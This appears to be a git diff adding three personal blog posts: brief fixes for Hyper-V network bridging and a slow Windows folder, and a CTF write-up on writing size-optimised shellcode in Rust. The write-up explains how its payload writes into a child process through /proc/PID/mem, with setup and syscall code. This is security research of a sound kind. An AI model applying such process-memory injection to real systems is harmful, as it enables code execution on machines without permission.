path = "/blog/why-do-my-bridges-not-work-1-one"
|
||||||
|
tags = ["homelab", "hyper-v", "lxd", "containers", "networking"]
|
||||||
|
title = "Human error is the root of all problems, especially with network bridges"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
When in doubt, the problem is directly caused by one's own stupidity.
|
||||||
|
|
||||||
|
I was trying to run an LXD host in a Hyper-V VM and went to set up bridged networking (in this case, *notworking*). Twice. The good old rule that it's caused by my stupidity rang very true. The problem was caused by the network adapter in the VM not having the ability to change the MAC address of its packets. The toggle is in the VM properties under advanced settings in the child node on the NIC.
|
||||||
|
|
||||||
|
This is why you should have a routed network.
|
||||||
|
|
||||||
18
content/posts/windows-folder-extremely-slow-to-load.md
Normal file
18
content/posts/windows-folder-extremely-slow-to-load.md
Normal file
|
|
@ -0,0 +1,18 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["windows", "small-fixes"]
|
||||||
|
date = 2016-06-28T21:38:26Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/windows-folder-extremely-slow-to-load"
|
||||||
|
tags = ["windows", "small-fixes"]
|
||||||
|
title = "Windows folder extremely slow to load"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Due to some weirdness and presumably thumbnail rendering, if a folder is set to "Optimize for Pictures", it takes 10+ times as long as it should to load. This was happening for my Downloads folder. It seems to only apply when it's accessed through "This PC".
|
||||||
|
|
||||||
|
Anyway, to fix it, in the properties of the folder in question, under "Customize", change "Optimize this folder for:" to "General Items" and it will work much better.
|
||||||
|
|
||||||
|
{{ image(name="slowfolder.png" alt="screenshot of the customize folder dialog demonstrating the change") }}
|
||||||
|
|
||||||
171
content/posts/writeonly-in-rust.md
Normal file
171
content/posts/writeonly-in-rust.md
Normal file
|
|
@ -0,0 +1,171 @@
|
||||||
|
+++
|
||||||
|
date = "2020-09-01"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/writeonly-in-rust"
|
||||||
|
tags = ["ctf", "rust", "osdev"]
|
||||||
|
title = "Writing shellcode in Rust"
|
||||||
|
+++
|
||||||
|
|
||||||
|
In my [Google CTF entry for `writeonly` this year](https://lfcode.ca/blog/gctf-2020-writeonly),
|
||||||
|
I wrote my first stage shellcode in C, which was somewhat novel in and of
|
||||||
|
itself, as it seemed like few people were willing to brave linker scripts to be
|
||||||
|
able to write shellcode in C. My hubris does not stop at C, however, and the
|
||||||
|
crab language seemed well suited for a port.
|
||||||
|
|
||||||
|
[Source code here](https://github.com/lf-/ctf/tree/main/writeonly.rs)
|
||||||
|
|
||||||
|
As with the previous C implementation, what we are doing here, with this
|
||||||
|
particular CTF challenge is fundamentally the same thing as operating system
|
||||||
|
kernels generally do, where they are loaded into memory with `memcpy`, then
|
||||||
|
jumped to without any real setup.
|
||||||
|
|
||||||
|
The first step was figuring out how to generate an executable with nothing in
|
||||||
|
it. I consulted [an OS dev guide](https://os.phil-opp.com/freestanding-rust-binary/)
|
||||||
|
for how to do this, and we do essentially the same thing here, but adding our
|
||||||
|
own section attribute to make sure the linker places the function correctly.
|
||||||
|
|
||||||
|
`src/main.rs`:
|
||||||
|
|
||||||
|
```rust
|
||||||
|
#![no_std]
|
||||||
|
#![no_main]
|
||||||
|
|
||||||
|
#[panic_handler]
|
||||||
|
fn panic(_: &core::panic::PanicInfo) -> ! {
|
||||||
|
loop {}
|
||||||
|
}
|
||||||
|
|
||||||
|
#[no_mangle]
|
||||||
|
#[link_section = ".text.prologue"]
|
||||||
|
pub extern "C" fn _start() -> ! {
|
||||||
|
loop {}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
-----
|
||||||
|
|
||||||
|
The next step was to set up Cargo. A trivial `Cargo.toml` is written, with
|
||||||
|
`panic = "abort"` set to avoid any unwinding machinery. `opt-level = "z"`
|
||||||
|
initially ballooned my code size, but after turning on LTO
|
||||||
|
[on advice of a Rust size optimization guide](https://github.com/johnthagen/min-sized-rust),
|
||||||
|
I got a massive win in code size, for the first time getting under 255 bytes.
|
||||||
|
|
||||||
|
`Cargo.toml`:
|
||||||
|
|
||||||
|
```toml
|
||||||
|
[package]
|
||||||
|
name = "shellcode"
|
||||||
|
edition = "2018"
|
||||||
|
version = "0.0.0"
|
||||||
|
|
||||||
|
[profile.dev]
|
||||||
|
panic = "abort"
|
||||||
|
|
||||||
|
[profile.release]
|
||||||
|
panic = "abort"
|
||||||
|
# these two cut code size by 2/3
|
||||||
|
opt-level = "z"
|
||||||
|
lto = true
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
[`.cargo/config.toml`](https://doc.rust-lang.org/cargo/reference/config.html):
|
||||||
|
|
||||||
|
```toml
|
||||||
|
[build]
|
||||||
|
rustflags = ["-C", "link-arg=-nostdlib", "-C", "link-arg=-static", "-C", "link-arg=-Wl,-Tshellcode.ld,--build-id=none"]
|
||||||
|
```
|
||||||
|
|
||||||
|
Internally, on Linux, Rust uses `gcc` as a linker, so I took the meaningful gcc
|
||||||
|
linking-stage flags and ported them directly over, and they just worked.
|
||||||
|
|
||||||
|
-----
|
||||||
|
|
||||||
|
Back to programming, I needed system calls. After very briefly considering
|
||||||
|
using a libc to deal with this stuff and throwing out the idea out of code size
|
||||||
|
concerns, I just grabbed the same assembly routines from the C implementation.
|
||||||
|
Rust has a [really nice inline asm syntax](https://github.com/rust-lang/rfcs/blob/master/text/2873-inline-asm.md)
|
||||||
|
which makes asm declarations clearer, and also has far better error messages
|
||||||
|
than Clang or GCC provide with their respective assemblers, so this required a
|
||||||
|
slight bit of porting.
|
||||||
|
|
||||||
|
```rust
|
||||||
|
unsafe fn syscall2(scnum: u64, arg1: u64, arg2: u64) -> u64 {
|
||||||
|
let ret: u64;
|
||||||
|
asm!(
|
||||||
|
"syscall",
|
||||||
|
in("rax") scnum,
|
||||||
|
in("rdi") arg1,
|
||||||
|
in("rsi") arg2,
|
||||||
|
out("rcx") _,
|
||||||
|
out("r11") _,
|
||||||
|
lateout("rax") ret,
|
||||||
|
options(nostack),
|
||||||
|
);
|
||||||
|
ret
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compare to the C equivalent:
|
||||||
|
|
||||||
|
```c
|
||||||
|
static inline long syscall2(long n, long a1, long a2)
|
||||||
|
{
|
||||||
|
unsigned long ret;
|
||||||
|
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2) : "rcx", "r11", "memory");
|
||||||
|
return ret;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
which uses hard-to-see colons as delimeters for the input, output, and clobber
|
||||||
|
lists and shortened single character versions of the registers that are
|
||||||
|
sometimes capitals if there are two with the same letter, e.g. `rdx` and `rdi`.
|
||||||
|
Also, if you're using Clang, there is no way to use Intel syntax for inline
|
||||||
|
assembly.
|
||||||
|
|
||||||
|
-----
|
||||||
|
|
||||||
|
The final step was to port the shellcode itself, which needs steal the child
|
||||||
|
PID from its caller's stack, make a path to `/proc/1234/mem`, where 1234 is the
|
||||||
|
child PID, then call `open(2)`, `lseek(2)`, then `write(2)`. I got most of the
|
||||||
|
way through a direct port, struggling a little bit with string manipulation in
|
||||||
|
fixed stack buffers, until someone on the Rust Discord pointed out that extra
|
||||||
|
slashes in paths are discarded, allowing a special `itoa` function to be
|
||||||
|
written that simply overwrites the path in place.
|
||||||
|
|
||||||
|
Specifically, it's possible to just do this:
|
||||||
|
|
||||||
|
```rust
|
||||||
|
let mut buf: [u8; 21] = *b"/proc////////////mem\0";
|
||||||
|
// start writing here ^
|
||||||
|
my_itoa(pid, &mut buf[6..16]);
|
||||||
|
```
|
||||||
|
|
||||||
|
and not worry about any extra slashes, which will be ignored. This also allows
|
||||||
|
the `itoa` implementation to avoid having to reverse the string simply by
|
||||||
|
writing from the end to the start. This also cut the code size in half,
|
||||||
|
avoiding having to construct a string dynamically.
|
||||||
|
|
||||||
|
The rest of the shellcode was essentially the same as the C implementation,
|
||||||
|
which I also ported to using this trick, out of interest in code size
|
||||||
|
comparison.
|
||||||
|
|
||||||
|
-----
|
||||||
|
|
||||||
|
## Results
|
||||||
|
|
||||||
|
Rust: 168 bytes of code
|
||||||
|
|
||||||
|
C: 157 bytes of code
|
||||||
|
|
||||||
|
I have not further dug into why there is an extra 11 bytes of code size for
|
||||||
|
Rust. I believe that this result demonstrates that Rust can indeed be used for
|
||||||
|
writing simple shellcode payloads with the same fitness for purpose as C,
|
||||||
|
however at the size and level of complexity tested, nothing can be concluded
|
||||||
|
about the relative developer productivity benefits of the two languages for
|
||||||
|
this application.
|
||||||
|
|
||||||
|
One annoying disadvantage of Rust is that I can't just `#include
|
||||||
|
<sys/syscall.h>` or other headers and get the various constants used in system
|
||||||
|
calls. It was not difficult to write a short C program to get these numbers,
|
||||||
|
but it wouldn't have been necessary in a C payload.
|
||||||
Loading…
Add table
Add a link
Reference in a new issue